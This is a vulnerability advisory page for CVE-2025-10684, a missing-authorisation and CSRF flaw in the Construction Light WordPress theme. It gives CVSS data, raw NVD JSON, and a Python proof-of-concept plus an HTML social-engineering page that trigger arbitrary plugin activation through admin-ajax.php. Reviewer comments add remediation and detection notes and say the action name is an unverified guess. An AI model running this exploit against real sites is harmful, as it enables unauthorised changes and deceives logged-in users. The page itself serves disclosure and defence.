Security Vulnerability Report
CVE-2025-10684 CVSS 4.3 MEDIUM

CVE-2025-10684

Published: 2025-12-12 06:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Construction Light WordPress theme before 1.6.8 does not have authorisation and CSRF when activating via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary .

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Construction Light Theme < 1.6.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10684 PoC - Construction Light Theme Unauthorized Plugin Activation
# This PoC demonstrates how an attacker can activate arbitrary plugins via AJAX
#
# Reviewer context (defensive):
#   - Root cause per the advisory on this page: the theme's AJAX handler performs
#     neither an authorization check nor a nonce check (CWE-287 / CWE-352).
#   - Remediation: update the theme to 1.6.8 or later. The fix pattern for a
#     WordPress AJAX handler of this kind is a capability check
#     (current_user_can('activate_plugins')) plus a nonce check
#     (check_ajax_referer()) before any state change.
#   - Detection: POST requests to wp-admin/admin-ajax.php carrying the theme's
#     plugin-activation action from low-privilege sessions, and plugin
#     activations in the audit/option history with no matching administrator
#     action.
#   - Caveats about this script: the action name below is explicitly marked as
#     a guess by its own comment and is not verified anywhere on this page; the
#     success heuristic at the bottom of the function is not proof of
#     activation (see NOTE(review) there); `requests` is a third-party
#     dependency; `html_poc` is built but never used or written out.

import requests
import sys
from urllib.parse import urljoin


def exploit_unauthorized_plugin_activation(target_url: str, target_plugin: str, cookie: str | None = None) -> None:
    """
    Exploit for CVE-2025-10684: Missing authorization and CSRF in Construction Light theme
    Allows any authenticated user (e.g., subscriber) to activate arbitrary plugins

    Sends a single POST to the site's admin-ajax.php endpoint and prints the
    HTTP status and body; it returns nothing and does not inspect the site's
    plugin state afterwards.

    Args:
        target_url: Target WordPress site URL
        target_plugin: Plugin path to activate (e.g., 'hello-dolly/hello.php')
        cookie: Authentication cookie (WordPress session cookie), sent verbatim
            as the request's Cookie header when provided; omitted otherwise.
    """
    # AJAX endpoint
    # urljoin drops any path component of target_url that lacks a trailing
    # slash, so a site installed under a sub-path may need target_url to end
    # with '/' for the resulting URL to be correct.
    ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php')

    # The vulnerable AJAX action - typically related to plugin activation
    # Replace 'construction_light_activate_plugin' with the actual action name
    # NOTE(review): the action name is a placeholder, not taken from the
    # advisory on this page; the request is sent regardless of whether it is
    # correct, so the output below cannot distinguish a wrong action from a
    # patched site.
    data = {
        'action': 'construction_light_activate_plugin',  # Vulnerable action
        'plugin': target_plugin,  # Arbitrary plugin path
        'nonce': ''  # Missing nonce verification (CSRF vulnerability)
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    # Only set when a cookie string was supplied; the truthiness test also
    # skips an empty string.
    if cookie:
        headers['Cookie'] = cookie

    print(f'[*] Target: {target_url}')
    print(f'[*] Plugin to activate: {target_plugin}')
    print(f'[*] Sending AJAX request to: {ajax_url}')

    try:
        # 30-second timeout covers both connect and read; any transport-level
        # failure is reported by the except branch below.
        response = requests.post(ajax_url, data=data, headers=headers, timeout=30)
        print(f'[*] Response Status: {response.status_code}')
        print(f'[*] Response Body: {response.text}')

        # NOTE(review): this condition is satisfied by any HTTP 200, so the
        # "[+]" line is printed for rejected or unrecognised requests as well;
        # admin-ajax.php typically answers 200 even when it refuses an action
        # (confirm against the target's WordPress version). Treat the printed
        # status as "request delivered", not "plugin activated" -- only the
        # site's plugin list shows the actual outcome.
        if 'success' in response.text.lower() or response.status_code == 200:
            print('[+] Plugin activation request sent successfully')
            print('[!] Note: Requires authenticated user with any role (subscriber+) on target')
        else:
            print('[-] Request may have failed or requires valid authentication')
    except requests.exceptions.RequestException as e:
        # Network/HTTP transport errors only; a non-2xx status is not raised
        # here because raise_for_status() is never called.
        print(f'[-] Request failed: {e}')


# HTML PoC for social engineering attack
# NOTE(review): this string is assigned but never referenced, printed or
# written to a file anywhere in this script; it documents the CSRF variant of
# the same weakness (the browser attaches the victim's session cookies via
# credentials: 'include'). The nonce check added in the fixed theme version is
# what defeats this variant.
html_poc = '''
<!-- CSRF PoC for CVE-2025-10684 -->
<!-- Trick authenticated user into activating arbitrary plugin -->
<html>
<body>
<h1>Construction Light Theme - Plugin Activation Exploit</h1>
<p>Click the button below to activate the target plugin...</p>
<button onclick="exploit()">Continue</button>
<script>
function exploit() {
    // Target plugin to activate
    const targetPlugin = 'hello-dolly/hello.php';

    // AJAX request to vulnerable endpoint
    fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: new URLSearchParams({
            'action': 'construction_light_activate_plugin',
            'plugin': targetPlugin
        }),
        credentials: 'include'  // Include authentication cookies
    })
    .then(response => response.text())
    .then(data => {
        console.log('Response:', data);
        alert('Plugin activation requested');
    })
    .catch(error => {
        console.error('Error:', error);
    });
}
</script>
</body>
</html>
'''

if __name__ == '__main__':
    # Positional CLI: <target_url> <plugin_path> [cookie]; the cookie is
    # optional and defaults to None, in which case no Cookie header is sent.
    if len(sys.argv) < 3:
        print('Usage: python cve-2025-10684.py <target_url> <plugin_path> [cookie]')
        print('Example: python cve-2025-10684.py http://example.com hello-dolly/hello.php')
        sys.exit(1)

    target = sys.argv[1]
    plugin = sys.argv[2]
    cookie = sys.argv[3] if len(sys.argv) > 3 else None

    exploit_unauthorized_plugin_activation(target, plugin, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10684", "sourceIdentifier": "[email protected]", "published": "2025-12-12T06:15:40.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Construction Light WordPress theme before 1.6.8 does not have authorisation and CSRF when activating via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary ."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://wpscan.com/vulnerability/cfabf8b2-30a4-462f-996c-79888a439c09/", "source": "[email protected]"}]}}